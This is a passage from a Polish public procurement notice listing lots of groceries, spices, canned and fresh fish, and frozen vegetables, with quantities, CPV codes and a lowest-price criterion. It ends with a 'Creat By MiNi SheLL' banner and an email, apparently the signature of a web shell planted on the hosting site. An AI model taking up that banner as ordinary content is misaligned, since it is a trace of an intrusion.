8.		Cukier waniliowy 30g	szt.	100					
9.		Cynamon 20g	szt.	10					
10.		Drożdże 100g	szt.	100					
11.		Dżemy różne smaki 280g	szt.	1.650					
12.		Fasola czerwona puszka 400g	szt.	100					
13.		Galaretka owocowa smaki różne 75g	szt.	300					
14.		Gałka muszkatołowa mielona 15 g	szt.	8					
15.		Groszek konserwowy 400g	szt.	300					
16.		Herbata granulowana 100g	szt.	1.500 					
17.		Imbir mielony 20 g	szt.	8					
18.		Kakao 100g	szt.	20					
19.		Kasza gryczana	kg	10					
20.		Kasza jęczmienna	kg	300					
21.		Kasza manna 	kg	200					
22.		Keczup łagodny 500 g	szt.	300					
23.		Kisiel 40g	szt.	1.100					
24.		Koncentrat pomidorowy
30 % 950g	szt.	210					
25.		Kukurydza w puszcze 400g	szt.	    200					
26.		Kwasek cytrynowy 20g	szt.	    160					
27.		Liść laurowy 10g	szt.	150					
28.		Majeranek 10g	szt.	400					
29.		Majonez 720ml	szt.	300					
30.		Mak 400g	szt.	10					
31.		Makaron gruby 	kg	900					
32.		Makaron wstążka - nitka 	kg	500					
33.		Makaron zacierka 0,25	szt. 	    600					
34.		Masło roślinne kubek 250g	szt.	1.300					
35.		Mąka pszenna	kg	   1.250					
36.		Mąka tortowa	kg	100					
37.		Mąka ziemniaczana	kg 	    100					
38.		Miód 25g	szt.	4.000					
39.		Miód sztuczny 370g	szt.	      10					
40.		Musztarda 190kg	szt.	280					
41.		Ocet 0,50 l	szt.	      10					
42.		Ogórek konserwowy 0,90 kg	szt.	60					
43.		Olej 1 l 	szt.	750					
44.		Papryka konserwowa 0,90 l	szt.	120					
45.		Papryka słodka 20g	szt.	200					
46.		Pieprz mielony 15g	szt.	850					
47.		Płatki jęczmienne 0,40 kg	szt.	    300					
48.		Płatki kukurydziane 0,50kg	szt.	500					
49.		Płatki owsiane 0,50 kg	szt.	   300					
50.		Powidła śliwkowe 280g	szt.	150					
51.		Proszek do pieczenia 30g	szt.	60					
52.		Przyprawa do potraw 200g	szt.	1.100 					
53.		Przyprawa w płynie 1 l	szt.	40					
54.		Przyprawa do drobiu 20g	szt.	30					
55.		Ryż	kg	    900					
56.		Seler konserwowy słoik 320g	szt.	100					
57.		Soda 80g	szt.	5					
58.		Sól jodowana 1 kg	kg	600					
59.		Ziele angielskie 15 g	szt.	    250					
60.		Żelatyna 50 g	szt.	      100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.33.00.00-0, 15.41.11.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sukcesywne dostawy ryb i konserw rybnych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	      Nazwa  artykułu	Jedn.
miary	Ilość	Cena 
netto	Wartość
netto
poz. 4 x 5	Stawka podatku
VAT w %	Wartość
podatku VAT poz. 6 x 7	Wartość  ogółem brutto
poz. 6 + 8
1	2	3	4	5	6	7	8	9
1.		Filet z mintaja schater bez lodu	kg	500					
2.		Filet z miruny ze skórą	kg	200					
3.		Karp filet	kg	15					
4.		Rolmopsy	kg	12					
5.		Śledzie po kaszubsku	kg	100					
6.		Makrela wędzona	kg	250					
7.		Paprykarz szczeciński 135 g	szt.	600					
8.		Sardynka w oleju 125 g	szt.	1.000					
9.		Szprot w oleju 125 g	szt.	1.200					
10.		Szprot w pomidorach 125g	   szt.	1.200					
11.		Śledź po wiejsku	kg	250					
12.		Tuńczyk w sosie własnym 185 g	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Sukcesywne dostawy warzyw i owoców mrożonych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p.	Nazwa  artykułu	Jedn.
miary	Ilość	Cena
netto	Wartość
netto
poz. 4 x 5	Stawka podatku
VAT w %	Wartość
podatku VAT poz. 6 x 7	Wartość  ogółem brutto
poz. 6 + 8
1	2	3	4	5	6	7	8	9
1.		Brokuły mrożone	kg	250					
2.		Fasolka szparagowa	kg	700					
3.		Leczo 	kg	150					
4.		Mieszanka kompotowa	kg	1.100					
5.		Mieszanka warzywna 
7 składnikowa	kg	300					
6.		Szpinak mrożony 	kg	30					
7.		Uszka z kapustą i grzybami 300g	szt.	60					
8.		Włoszczyzna mrożona paski 	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com